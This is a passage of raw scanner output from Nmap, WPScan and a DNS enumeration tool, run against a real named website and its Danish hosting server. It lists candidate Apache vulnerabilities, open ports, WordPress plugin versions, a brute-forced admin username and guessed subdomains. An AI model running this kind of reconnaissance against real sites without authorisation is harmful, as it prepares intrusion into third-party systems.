17623| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
17624| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
17625| [2149] Apache::Gallery Privilege Escalation
17626| [2107] Apache HTTP Server mod_ssl Host: Header XSS
17627| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
17628| [1833] Apache HTTP Server Multiple Slash GET Request DoS
17629| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
17630| [872] Apache Tomcat Multiple Default Accounts
17631| [862] Apache HTTP Server SSI Error Page XSS
17632| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
17633| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
17634| [845] Apache Tomcat MSDOS Device XSS
17635| [844] Apache Tomcat Java Servlet Error Page XSS
17636| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
17637| [838] Apache HTTP Server Chunked Encoding Remote Overflow
17638| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
17639| [775] Apache mod_python Module Importing Privilege Function Execution
17640| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
17641| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
17642| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
17643| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
17644| [637] Apache HTTP Server UserDir Directive Username Enumeration
17645| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
17646| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
17647| [562] Apache HTTP Server mod_info /server-info Information Disclosure
17648| [561] Apache Web Servers mod_status /server-status Information Disclosure
17649| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
17650| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
17651| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
17652| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
17653| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
17654| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
17655| [376] Apache Tomcat contextAdmin Arbitrary File Access
17656| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
17657| [222] Apache HTTP Server test-cgi Arbitrary File Access
17658| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
17659| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
17660|_
17661445/tcp closed microsoft-ds
17662989/tcp closed ftps-data
17663990/tcp closed ftps
17664Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 or 3.10 (93%), WatchGuard Fireware 11.8 (93%), Synology DiskStation Manager 5.1 (92%), Linux 3.10 (92%), Linux 2.6.39 (92%), Linux 3.4 (92%), Linux 3.1 - 3.2 (90%), Linux 2.6.32 - 2.6.39 (90%), Linux 3.2 - 3.8 (88%)
17665No exact OS matches for host (test conditions non-ideal).
17666Uptime guess: 1.869 days (since Tue Jan 14 23:05:30 2020)
17667Network Distance: 14 hops
17668TCP Sequence Prediction: Difficulty=260 (Good luck!)
17669IP ID Sequence Generation: All zeros
17670
17671TRACEROUTE (using port 20/tcp)
17672HOP RTT ADDRESS
176731 221.14 ms 10.248.204.1
176742 221.22 ms salmondeal.com.0.116.160.in-addr.arpa (160.116.0.161)
176753 221.20 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
176764 221.23 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
176775 379.28 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
176786 379.33 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
176797 379.39 ms ae13.cr1-ams2.ip4.gtt.net (89.149.143.2)
176808 379.36 ms ae13.cr1-ams2.ip4.gtt.net (89.149.143.2)
176819 379.42 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
1768210 379.49 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
1768311 323.41 ms cpe.xe-5-0-1-101.sdnqe10.dk.customer.tdc.net (195.41.183.146)
1768412 480.33 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
1768513 ...
1768614 480.27 ms linux307.unoeuro.com (93.191.156.197)
17687
17688NSE: Script Post-scanning.
17689Initiating NSE at 19:57
17690Completed NSE at 19:57, 0.00s elapsed
17691Initiating NSE at 19:57
17692Completed NSE at 19:57, 0.00s elapsed
17693#######################################################################################################################################
17694Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:57 EST
17695NSE: Loaded 47 scripts for scanning.
17696NSE: Script Pre-scanning.
17697Initiating NSE at 19:57
17698Completed NSE at 19:57, 0.00s elapsed
17699Initiating NSE at 19:57
17700Completed NSE at 19:57, 0.00s elapsed
17701Initiating Parallel DNS resolution of 1 host. at 19:57
17702Completed Parallel DNS resolution of 1 host. at 19:57, 0.02s elapsed
17703Initiating UDP Scan at 19:57
17704Scanning linux307.unoeuro.com (93.191.156.197) [15 ports]
17705Completed UDP Scan at 19:57, 6.62s elapsed (15 total ports)
17706Initiating Service scan at 19:57
17707Scanning 13 services on linux307.unoeuro.com (93.191.156.197)
17708Service scan Timing: About 7.69% done; ETC: 20:18 (0:19:24 remaining)
17709Completed Service scan at 19:58, 102.60s elapsed (13 services on 1 host)
17710Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
17711Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
17712Initiating Traceroute at 19:59
17713Completed Traceroute at 19:59, 7.35s elapsed
17714Initiating Parallel DNS resolution of 1 host. at 19:59
17715Completed Parallel DNS resolution of 1 host. at 19:59, 0.00s elapsed
17716NSE: Script scanning 93.191.156.197.
17717Initiating NSE at 19:59
17718Completed NSE at 19:59, 8.13s elapsed
17719Initiating NSE at 19:59
17720Completed NSE at 19:59, 2.31s elapsed
17721Nmap scan report for linux307.unoeuro.com (93.191.156.197)
17722Host is up (0.33s latency).
17723
17724PORT STATE SERVICE VERSION
1772553/udp open|filtered domain
1772667/udp open|filtered dhcps
1772768/udp open|filtered dhcpc
1772869/udp open|filtered tftp
1772988/udp open|filtered kerberos-sec
17730123/udp open|filtered ntp
17731137/udp filtered netbios-ns
17732138/udp filtered netbios-dgm
17733139/udp open|filtered netbios-ssn
17734161/udp open|filtered snmp
17735162/udp open|filtered snmptrap
17736389/udp open|filtered ldap
17737500/udp open|filtered isakmp
17738|_ike-version: ERROR: Script execution failed (use -d to debug)
17739520/udp open|filtered route
177402049/udp open|filtered nfs
17741Too many fingerprints match this host to give specific OS details
17742
17743TRACEROUTE (using port 137/udp)
17744HOP RTT ADDRESS
177451 ...
177462 316.11 ms 10.248.204.1
177473 ...
177484 256.46 ms 10.248.204.1
177495 271.56 ms 10.248.204.1
177506 271.54 ms 10.248.204.1
177517 271.53 ms 10.248.204.1
177528 271.52 ms 10.248.204.1
177539 271.52 ms 10.248.204.1
1775410 271.49 ms 10.248.204.1
1775511 ... 18
1775619 265.00 ms 10.248.204.1
1775720 215.74 ms 10.248.204.1
1775821 ... 27
1775928 158.11 ms 10.248.204.1
1776029 ...
1776130 230.45 ms 10.248.204.1
17762
17763NSE: Script Post-scanning.
17764Initiating NSE at 19:59
17765Completed NSE at 19:59, 0.00s elapsed
17766Initiating NSE at 19:59
17767Completed NSE at 19:59, 0.00s elapsed
17768Read data files from: /usr/bin/../share/nmap
17769OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
17770Nmap done: 1 IP address (1 host up) scanned in 137.06 seconds
17771 Raw packets sent: 137 (12.098KB) | Rcvd: 34 (3.836KB)
17772######################################################################################################################################
17773[+] URL: http://hizb-ut-tahrir.se/
17774[+] Started: Thu Jan 16 19:18:11 2020
17775
17776Interesting Finding(s):
17777
17778[+] http://hizb-ut-tahrir.se/
17779 | Interesting Entries:
17780 | - Server: Apache
17781 | - X-Powered-By: PHP/5.6.40
17782 | - Upgrade: h2
17783 | Found By: Headers (Passive Detection)
17784 | Confidence: 100%
17785
17786[+] http://hizb-ut-tahrir.se/robots.txt
17787 | Found By: Robots Txt (Aggressive Detection)
17788 | Confidence: 100%
17789
17790[+] http://hizb-ut-tahrir.se/xmlrpc.php
17791 | Found By: Link Tag (Passive Detection)
17792 | Confidence: 30%
17793 | References:
17794 | - http://codex.wordpress.org/XML-RPC_Pingback_API
17795 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
17796 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
17797 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
17798 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
17799
17800[+] http://hizb-ut-tahrir.se/readme.html
17801 | Found By: Direct Access (Aggressive Detection)
17802 | Confidence: 100%
17803
17804[+] http://hizb-ut-tahrir.se/wp-cron.php
17805 | Found By: Direct Access (Aggressive Detection)
17806 | Confidence: 60%
17807 | References:
17808 | - https://www.iplocation.net/defend-wordpress-from-ddos
17809 | - https://github.com/wpscanteam/wpscan/issues/1299
17810
17811[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
17812 | Found By: Rss Generator (Passive Detection)
17813 | - https://hizb-ut-tahrir.se/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
17814 | - https://hizb-ut-tahrir.se/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
17815
17816[+] WordPress theme in use: flymag
17817 | Location: http://hizb-ut-tahrir.se/wp-content/themes/flymag/
17818 | Latest Version: 2.0.6 (up to date)
17819 | Last Updated: 2018-11-28T00:00:00.000Z
17820 | Readme: http://hizb-ut-tahrir.se/wp-content/themes/flymag/readme.txt
17821 | Style URL: http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2
17822 | Style Name: FlyMag
17823 | Style URI: http://themeisle.com/themes/flymag/
17824 | Description: Flymag is a responsive magazine theme with a modern look. Flymag lets you use any of the 600+ Google...
17825 | Author: Themeisle
17826 | Author URI: http://themeisle.com
17827 |
17828 | Found By: Css Style In Homepage (Passive Detection)
17829 | Confirmed By: Css Style In 404 Page (Passive Detection)
17830 |
17831 | Version: 2.0.6 (80% confidence)
17832 | Found By: Style (Passive Detection)
17833 | - http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2, Match: 'Version: 2.0.6'
17834
17835[+] Enumerating All Plugins (via Passive Methods)
17836[+] Checking Plugin Versions (via Passive and Aggressive Methods)
17837
17838[i] Plugin(s) Identified:
17839
17840[+] lazy-load
17841 | Location: http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/
17842 | Latest Version: 0.6.1 (up to date)
17843 | Last Updated: 2018-11-22T04:43:00.000Z
17844 |
17845 | Found By: Urls In Homepage (Passive Detection)
17846 | Confirmed By: Urls In 404 Page (Passive Detection)
17847 |
17848 | Version: 0.6.1 (100% confidence)
17849 | Found By: Query Parameter (Passive Detection)
17850 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/js/jquery.sonar.min.js?ver=0.6.1
17851 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/js/lazy-load.js?ver=0.6.1
17852 | Confirmed By:
17853 | Readme - Stable Tag (Aggressive Detection)
17854 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/readme.txt
17855 | Readme - ChangeLog Section (Aggressive Detection)
17856 | - http://hizb-ut-tahrir.se/wp-content/plugins/lazy-load/readme.txt
17857
17858[+] ultimate-faqs
17859 | Location: http://hizb-ut-tahrir.se/wp-content/plugins/ultimate-faqs/
17860 | Last Updated: 2020-01-06T15:37:00.000Z
17861 | [!] The version is out of date, the latest version is 1.8.30
17862 |
17863 | Found By: Urls In Homepage (Passive Detection)
17864 | Confirmed By: Urls In 404 Page (Passive Detection)
17865 |
17866 | Version: 1.8.20 (50% confidence)
17867 | Found By: Readme - ChangeLog Section (Aggressive Detection)
17868 | - http://hizb-ut-tahrir.se/wp-content/plugins/ultimate-faqs/readme.txt
17869
17870[+] Enumerating Config Backups (via Passive and Aggressive Methods)
17871 Checking Config Backups - Time: 00:00:06 <=============> (21 / 21) 100.00% Time: 00:00:06
17872
17873[i] No Config Backups Found.
17874
17875[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
17876[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
17877
17878[+] Finished: Thu Jan 16 19:18:28 2020
17879[+] Requests Done: 31
17880[+] Cached Requests: 30
17881[+] Data Sent: 5.982 KB
17882[+] Data Received: 155.51 KB
17883[+] Memory used: 186.75 MB
17884[+] Elapsed time: 00:00:16
17885#######################################################################################################################################
17886
17887[+] URL: http://hizb-ut-tahrir.se/
17888[+] Started: Thu Jan 16 19:17:59 2020
17889
17890Interesting Finding(s):
17891
17892[+] http://hizb-ut-tahrir.se/
17893 | Interesting Entries:
17894 | - Server: Apache
17895 | - X-Powered-By: PHP/5.6.40
17896 | - Upgrade: h2
17897 | Found By: Headers (Passive Detection)
17898 | Confidence: 100%
17899
17900[+] http://hizb-ut-tahrir.se/robots.txt
17901 | Found By: Robots Txt (Aggressive Detection)
17902 | Confidence: 100%
17903
17904[+] http://hizb-ut-tahrir.se/xmlrpc.php
17905 | Found By: Link Tag (Passive Detection)
17906 | Confidence: 30%
17907 | References:
17908 | - http://codex.wordpress.org/XML-RPC_Pingback_API
17909 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
17910 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
17911 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
17912 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
17913
17914[+] http://hizb-ut-tahrir.se/readme.html
17915 | Found By: Direct Access (Aggressive Detection)
17916 | Confidence: 100%
17917
17918[+] http://hizb-ut-tahrir.se/wp-cron.php
17919 | Found By: Direct Access (Aggressive Detection)
17920 | Confidence: 60%
17921 | References:
17922 | - https://www.iplocation.net/defend-wordpress-from-ddos
17923 | - https://github.com/wpscanteam/wpscan/issues/1299
17924
17925[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
17926 | Found By: Rss Generator (Passive Detection)
17927 | - https://hizb-ut-tahrir.se/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
17928 | - https://hizb-ut-tahrir.se/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
17929
17930[+] WordPress theme in use: flymag
17931 | Location: http://hizb-ut-tahrir.se/wp-content/themes/flymag/
17932 | Latest Version: 2.0.6 (up to date)
17933 | Last Updated: 2018-11-28T00:00:00.000Z
17934 | Readme: http://hizb-ut-tahrir.se/wp-content/themes/flymag/readme.txt
17935 | Style URL: http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2
17936 | Style Name: FlyMag
17937 | Style URI: http://themeisle.com/themes/flymag/
17938 | Description: Flymag is a responsive magazine theme with a modern look. Flymag lets you use any of the 600+ Google...
17939 | Author: Themeisle
17940 | Author URI: http://themeisle.com
17941 |
17942 | Found By: Css Style In Homepage (Passive Detection)
17943 | Confirmed By: Css Style In 404 Page (Passive Detection)
17944 |
17945 | Version: 2.0.6 (80% confidence)
17946 | Found By: Style (Passive Detection)
17947 | - http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2, Match: 'Version: 2.0.6'
17948
17949[+] Enumerating Users (via Passive and Aggressive Methods)
17950 Brute Forcing Author IDs - Time: 00:00:08 <==> (10 / 10) 100.00% Time: 00:00:08
17951
17952[i] User(s) Identified:
17953
17954[+] admin
17955 | Found By: Author Posts - Author Pattern (Passive Detection)
17956 | Confirmed By:
17957 | Rss Generator (Passive Detection)
17958 | Wp Json Api (Aggressive Detection)
17959 | - https://hizb-ut-tahrir.se/wp-json/wp/v2/users/?per_page=100&page=1
17960 | Rss Generator (Aggressive Detection)
17961 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
17962
17963[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
17964[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
17965
17966[+] Finished: Thu Jan 16 19:18:32 2020
17967[+] Requests Done: 47
17968[+] Cached Requests: 8
17969[+] Data Sent: 9.043 KB
17970[+] Data Received: 503.312 KB
17971[+] Memory used: 125.523 MB
17972[+] Elapsed time: 00:00:32
17973#######################################################################################################################################
17974[+] URL: http://hizb-ut-tahrir.se/
17975[+] Started: Thu Jan 16 19:21:08 2020
17976
17977Interesting Finding(s):
17978
17979[+] http://hizb-ut-tahrir.se/
17980 | Interesting Entries:
17981 | - Server: Apache
17982 | - X-Powered-By: PHP/5.6.40
17983 | - Upgrade: h2
17984 | Found By: Headers (Passive Detection)
17985 | Confidence: 100%
17986
17987[+] http://hizb-ut-tahrir.se/robots.txt
17988 | Found By: Robots Txt (Aggressive Detection)
17989 | Confidence: 100%
17990
17991[+] http://hizb-ut-tahrir.se/xmlrpc.php
17992 | Found By: Link Tag (Passive Detection)
17993 | Confidence: 30%
17994 | References:
17995 | - http://codex.wordpress.org/XML-RPC_Pingback_API
17996 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
17997 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
17998 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
17999 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
18000
18001[+] http://hizb-ut-tahrir.se/readme.html
18002 | Found By: Direct Access (Aggressive Detection)
18003 | Confidence: 100%
18004
18005[+] http://hizb-ut-tahrir.se/wp-cron.php
18006 | Found By: Direct Access (Aggressive Detection)
18007 | Confidence: 60%
18008 | References:
18009 | - https://www.iplocation.net/defend-wordpress-from-ddos
18010 | - https://github.com/wpscanteam/wpscan/issues/1299
18011
18012[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
18013 | Found By: Rss Generator (Passive Detection)
18014 | - https://hizb-ut-tahrir.se/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
18015 | - https://hizb-ut-tahrir.se/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
18016
18017[+] WordPress theme in use: flymag
18018 | Location: http://hizb-ut-tahrir.se/wp-content/themes/flymag/
18019 | Latest Version: 2.0.6 (up to date)
18020 | Last Updated: 2018-11-28T00:00:00.000Z
18021 | Readme: http://hizb-ut-tahrir.se/wp-content/themes/flymag/readme.txt
18022 | Style URL: http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2
18023 | Style Name: FlyMag
18024 | Style URI: http://themeisle.com/themes/flymag/
18025 | Description: Flymag is a responsive magazine theme with a modern look. Flymag lets you use any of the 600+ Google...
18026 | Author: Themeisle
18027 | Author URI: http://themeisle.com
18028 |
18029 | Found By: Css Style In Homepage (Passive Detection)
18030 | Confirmed By: Css Style In 404 Page (Passive Detection)
18031 |
18032 | Version: 2.0.6 (80% confidence)
18033 | Found By: Style (Passive Detection)
18034 | - http://hizb-ut-tahrir.se/wp-content/themes/flymag/style.css?ver=5.3.2, Match: 'Version: 2.0.6'
18035
18036[+] Enumerating Users (via Passive and Aggressive Methods)
18037 Brute Forcing Author IDs - Time: 00:00:02 <============> (10 / 10) 100.00% Time: 00:00:02
18038
18039[i] User(s) Identified:
18040
18041[+] admin
18042 | Found By: Author Posts - Author Pattern (Passive Detection)
18043 | Confirmed By:
18044 | Rss Generator (Passive Detection)
18045 | Wp Json Api (Aggressive Detection)
18046 | - https://hizb-ut-tahrir.se/wp-json/wp/v2/users/?per_page=100&page=1
18047 | Rss Generator (Aggressive Detection)
18048 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
18049
18050[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
18051[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
18052
18053[+] Finished: Thu Jan 16 19:21:16 2020
18054[+] Requests Done: 14
18055[+] Cached Requests: 41
18056[+] Data Sent: 2.669 KB
18057[+] Data Received: 29.759 KB
18058[+] Memory used: 124.945 MB
18059[+] Elapsed time: 00:00:08
18060######################################################################################################################################
18061[INFO] ------TARGET info------
18062[*] TARGET: http://hizb-ut-tahrir.se/
18063[*] TARGET IP: 93.191.156.197
18064[INFO] NO load balancer detected for hizb-ut-tahrir.se...
18065[*] DNS servers: ns1.unoeuro.com.
18066[*] TARGET server: Apache
18067[*] CC: DK
18068[*] Country: Denmark
18069[*] RegionCode: 82
18070[*] RegionName: Central Jutland
18071[*] City: Skanderborg
18072[*] ASN: AS48854
18073[*] BGP_PREFIX: 93.191.152.0/21
18074[*] ISP: ZITCOM Zitcom A/S, DK
18075[INFO] DNS enumeration:
18076[*] ad.hizb-ut-tahrir.se 93.191.156.197
18077[*] admin.hizb-ut-tahrir.se 93.191.156.197
18078[*] ads.hizb-ut-tahrir.se 93.191.156.197
18079[*] alpha.hizb-ut-tahrir.se 93.191.156.197
18080[*] api.hizb-ut-tahrir.se 93.191.156.197
18081[*] api-online.hizb-ut-tahrir.se 93.191.156.197
18082[*] apolo.hizb-ut-tahrir.se 93.191.156.197
18083[*] app.hizb-ut-tahrir.se 93.191.156.197
18084[*] beta.hizb-ut-tahrir.se 93.191.156.197
18085[*] bi.hizb-ut-tahrir.se 93.191.156.197
18086[*] blog.hizb-ut-tahrir.se 93.191.156.197
18087[*] cdn.hizb-ut-tahrir.se 93.191.156.197
18088[*] events.hizb-ut-tahrir.se 93.191.156.197
18089[*] ex.hizb-ut-tahrir.se 93.191.156.197
18090[*] files.hizb-ut-tahrir.se 93.191.156.197
18091[*] ftp.hizb-ut-tahrir.se 93.191.156.197
18092[*] gateway.hizb-ut-tahrir.se 93.191.156.197
18093[*] go.hizb-ut-tahrir.se 93.191.156.197
18094[*] help.hizb-ut-tahrir.se 93.191.156.197
18095[*] ib.hizb-ut-tahrir.se 93.191.156.197
18096[*] images.hizb-ut-tahrir.se 93.191.156.197
18097[*] internetbanking.hizb-ut-tahrir.se 93.191.156.197
18098[*] intranet.hizb-ut-tahrir.se 93.191.156.197
18099[*] jobs.hizb-ut-tahrir.se 93.191.156.197
18100[*] join.hizb-ut-tahrir.se 93.191.156.197
18101[*] live.hizb-ut-tahrir.se 93.191.156.197
18102[*] login.hizb-ut-tahrir.se 93.191.156.197
18103[*] m.hizb-ut-tahrir.se 93.191.156.197
18104[*] mail.hizb-ut-tahrir.se mail.unoeuro.com. 94.231.103.107
18105[*] mail2.hizb-ut-tahrir.se 93.191.156.197
18106[*] mobile.hizb-ut-tahrir.se 93.191.156.197
18107[*] moodle.hizb-ut-tahrir.se 93.191.156.197
18108[*] mx.hizb-ut-tahrir.se 93.191.156.197
18109[*] mx2.hizb-ut-tahrir.se 93.191.156.197
18110[*] mx3.hizb-ut-tahrir.se 93.191.156.197
18111[*] my.hizb-ut-tahrir.se 93.191.156.197
18112[*] new.hizb-ut-tahrir.se 93.191.156.197
18113[*] news.hizb-ut-tahrir.se 93.191.156.197
18114[*] ns1.hizb-ut-tahrir.se 93.191.156.197
18115[*] ns2.hizb-ut-tahrir.se 93.191.156.197
18116[*] ns3.hizb-ut-tahrir.se 93.191.156.197
18117[*] oauth.hizb-ut-tahrir.se 93.191.156.197
18118[*] old.hizb-ut-tahrir.se 93.191.156.197
18119[*] one.hizb-ut-tahrir.se 93.191.156.197
18120[*] open.hizb-ut-tahrir.se 93.191.156.197
18121[*] out.hizb-ut-tahrir.se 93.191.156.197
18122[*] outlook.hizb-ut-tahrir.se 93.191.156.197
18123[*] portfolio.hizb-ut-tahrir.se 93.191.156.197
18124[*] raw.hizb-ut-tahrir.se 93.191.156.197
18125[*] repo.hizb-ut-tahrir.se 93.191.156.197
18126[*] router.hizb-ut-tahrir.se 93.191.156.197
18127[*] search.hizb-ut-tahrir.se 93.191.156.197
18128[*] siem.hizb-ut-tahrir.se 93.191.156.197
18129[*] slack.hizb-ut-tahrir.se 93.191.156.197
18130[*] slackbot.hizb-ut-tahrir.se 93.191.156.197
18131[*] snmp.hizb-ut-tahrir.se 93.191.156.197
18132[*] stream.hizb-ut-tahrir.se 93.191.156.197
18133[*] support.hizb-ut-tahrir.se 93.191.156.197
18134[*] syslog.hizb-ut-tahrir.se 93.191.156.197
18135[*] tags.hizb-ut-tahrir.se 93.191.156.197
18136[*] test.hizb-ut-tahrir.se 93.191.156.197
18137[*] upload.hizb-ut-tahrir.se 93.191.156.197
18138[*] video.hizb-ut-tahrir.se 93.191.156.197
18139[*] vpn.hizb-ut-tahrir.se 93.191.156.197
18140[*] webconf.hizb-ut-tahrir.se 93.191.156.197
18141[*] webmail.hizb-ut-tahrir.se 93.191.156.197
18142[*] webportal.hizb-ut-tahrir.se 93.191.156.197
18143[*] wiki.hizb-ut-tahrir.se 93.191.156.197
18144[*] www2.hizb-ut-tahrir.se 93.191.156.197
18145[*] www3.hizb-ut-tahrir.se 93.191.156.197
18146[*] zendesk.hizb-ut-tahrir.se 93.191.156.197
18147[INFO] Possible abuse mails are:
18148[*] abuse@hizb-ut-tahrir.se
18149[*] abuse@zitcom.dk
18150[INFO] NO PAC (Proxy Auto Configuration) file FOUND
18151[ALERT] robots.txt file FOUND in http://hizb-ut-tahrir.se/robots.txt
18152[INFO] Checking for HTTP status codes recursively from http://hizb-ut-tahrir.se/robots.txt
18153[INFO] Status code Folders
18154[*] 200 http://hizb-ut-tahrir.se/
18155[*] 200 http://hizb-ut-tahrir.se/webalizer/
18156[INFO] Starting FUZZing in http://hizb-ut-tahrir.se/FUzZzZzZzZz...
18157[INFO] Status code Folders
18158[ALERT] Look in the source code. It may contain passwords
18159[INFO] Links found from http://hizb-ut-tahrir.se/ http://93.191.156.197/:
18160[*] http://hizb-afghanistan.org/
18161[*] http://hizb-pakistan.org/
18162[*] http://hizb-ut-tahrir.se/
18163[*] http://hizb-ut-tahrir.se/#content
18164[*] https://hizb-america.org/
18165[*] https://hizb.org.ua/ru/
18166[*] https://hizb-russia.info/
18167[*] https://hizb-ut-tahrir.se/
18168[*] https://hizb-ut-tahrir.se/158/
18169[*] https://hizb-ut-tahrir.se/882/
18170[*] https://hizb-ut-tahrir.se/900/
18171[*] https://hizb-ut-tahrir.se/annu-ett-forsok-att-fa-muslimerna-att-avsaga-sig-sin-islamiska-identitet/
18172[*] https://hizb-ut-tahrir.se/artiklar/
18173[*] https://hizb-ut-tahrir.se/author/admin/
18174[*] https://hizb-ut-tahrir.se/bocker/
18175[*] https://hizb-ut-tahrir.se/broschyrer/
18176[*] https://hizb-ut-tahrir.se/category/artiklar/
18177[*] https://hizb-ut-tahrir.se/category/engelska-bocker/
18178[*] https://hizb-ut-tahrir.se/category/svenska-bocker/
18179[*] https://hizb-ut-tahrir.se/comments/feed/
18180[*] https://hizb-ut-tahrir.se/den-islamiska-identiteten-ar-i-fara-muslimerna-maste-agera-nu/
18181[*] https://hizb-ut-tahrir.se/de-svenska-myndigheternas-fortvivlade-forsok-att-kvava-hizb-ut-tahrirs-kall/
18182[*] https://hizb-ut-tahrir.se/faq/
18183[*] https://hizb-ut-tahrir.se/feed/
18184[*] https://hizb-ut-tahrir.se/hizb-ut-tahrir/
18185[*] https://hizb-ut-tahrir.se/intellektuella-introduktion-till-islam/
18186[*] https://hizb-ut-tahrir.se/koranen-branns-med-den-danska-regeringens-valsignelse/
18187[*] https://hizb-ut-tahrir.se/massakern-i-nya-zeeland-de-vasterlandska-regeringarna-och-medierna-bar-ansvaret-for-hatet/
18188[*] https://hizb-ut-tahrir.se/med-ramadans-ankomst-kommer-islamfientlighetens-test-pa-muslimernas-iman/
18189[*] https://hizb-ut-tahrir.se/page/2/
18190[*] https://hizb-ut-tahrir.se/pressmeddelande-hizb-ut-tahrirs-kampanj-i-sverige-anvand-din-rost-men-inte-till-valet/
18191[*] https://hizb-ut-tahrir.se/pressmeddelande-imam-skandalen-i-sverige-en-existentiell-kris-for-demokratin/
18192[*] https://hizb-ut-tahrir.se/profeten-muhammad-fordomar-och-fakta/
18193[*] https://hizb-ut-tahrir.se/videos/
18194[*] https://mykhilafah.com/
18195[*] https://www.facebook.com/Hizb-ut-Tahrir-Sverige-2338466706174842/
18196[*] https://www.unoeuro.com/controlpanel/?utm_campaign=splash&utm_source=unoeuro-splash&utm_medium=splash
18197[*] https://www.unoeuro.com/domains/?utm_campaign=splash&utm_source=unoeuro-splash&utm_medium=splash
18198[*] https://www.unoeuro.com/products/webhotel/?utm_campaign=splash&utm_source=unoeuro-splash&utm_medium=splash
18199[*] https://www.unoeuro.com/support/?utm_campaign=splash&utm_source=unoeuro-splash&utm_medium=splash
18200[*] https://www.unoeuro.com/?utm_campaign=splash&utm_source=unoeuro-splash&utm_medium=splash
18201[*] http://tahrir-syria.info/
18202[*] http://www.hizb-australia.org/
18203[*] http://www.hizb.org.uk/
18204[*] http://www.hizb-ut-tahrir-almaghreb.info/
18205[*] http://www.hizb-ut-tahrir.dk/
18206[*] http://www.hizb-ut-tahrir.info/
18207[*] http://www.hizb-ut-tahrir.nl/
18208[*] http://www.hizb-ut-tahrir.org/
18209[*] http://www.pal-tahrir.info/
18210cut: intervalle de champ incorrecte
18211Saisissez « cut --help » pour plus d'informations.
18212[INFO] Shodan detected the following opened ports on 93.191.156.197:
18213[*] 22
18214[*] 443
18215[*] 7
18216[*] 80
18217[INFO] ------VirusTotal SECTION------
18218[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
